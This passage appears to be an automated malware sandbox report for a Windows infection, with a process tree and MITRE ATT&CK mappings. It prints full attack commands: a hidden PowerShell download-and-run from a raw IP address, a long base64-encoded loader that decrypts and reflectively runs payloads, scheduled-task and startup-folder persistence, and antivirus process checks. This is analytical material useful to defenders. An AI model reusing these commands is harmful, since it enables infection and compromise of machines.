        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE21.tmp\BE22.tmp\BE23.bat C:\Users\Admin\AppData\Local\Temp\10118770101\jdehFMM.exe"
        8⤵
        
        PID:4092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10119311121\1b3yDoR.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10119311121\1b3yDoR.cmd"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZmZ0bnogPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGZmdG56KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRmZnRueiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRmZnRueiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZmZ0bnoiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gdHp6a2ooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ25ZaHg4TTNkRGdlZXV5R0w4TmpHdUhVaSszUzJid1oxamJNVXB2SkVJRUk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2diNktFYTlLWEVoNHl3dDZYNURoK3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb3Vhb24oJHBhcmFtX3Zhcil7CSRmZGJ2dT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkdHpmZG89TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkaW5haXI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZmRidnUsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGluYWlyLkNvcHlUbygkdHpmZG8pOwkkaW5haXIuRGlzcG9zZSgpOwkkZmRidnUuRGlzcG9zZSgpOwkkdHpmZG8uRGlzcG9zZSgpOwkkdHpmZG8uVG9BcnJheSgpO31mdW5jdGlvbiBudmNjdCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHJub2p3PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJHd3bnNsPSRybm9qdy5FbnRyeVBvaW50Owkkd3duc2wuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGZmdG56OyRhaGJveD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGZmdG56KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkYmhrIGluICRhaGJveCkgewlpZiAoJGJoay5TdGFydHNXaXRoKCc6OiAnKSkJewkJJG9nY3lrPSRiaGsuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGdvYmp1PVtzdHJpbmdbXV0kb2djeWsuU3BsaXQoJ1wnKTskcnprbnk9b3Vhb24gKHR6emtqIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdvYmp1WzBdKSkpOyRraHhteD1vdWFvbiAodHp6a2ogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZ29ianVbMV0pKSk7bnZjY3QgJHJ6a255ICRudWxsO252Y2N0ICRraHhteCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10119880101\6sbmSAg.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10121660101\amnew.exe"
        7⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        8⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10122100141\ogfNbjS.ps1"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\10122110101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122110101\zY9sqWs.exe"
        7⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1016
        8⤵
        Program crash
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\10122120101\pwHxMTy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122120101\pwHxMTy.exe"
        7⤵
        
        PID:892
        
        C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe"
        7⤵
        
        PID:3104
        
        C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122130101\MCxU5Fj.exe"
        8⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1032
        9⤵
        Program crash
        
        PID:3828
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 508
        8⤵
        Program crash
        
        PID:3212
        
        C:\Users\Admin\AppData\Local\Temp\10122170101\ADFoyxP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122170101\ADFoyxP.exe"
        7⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        8⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        9⤵
        
        PID:3696
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:3720
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        9⤵
        
        PID:3728
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:3504
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        9⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\10122180101\9hUDDVk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10122180101\9hUDDVk.exe"
        7⤵
        
        PID:3948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2700
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:3004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion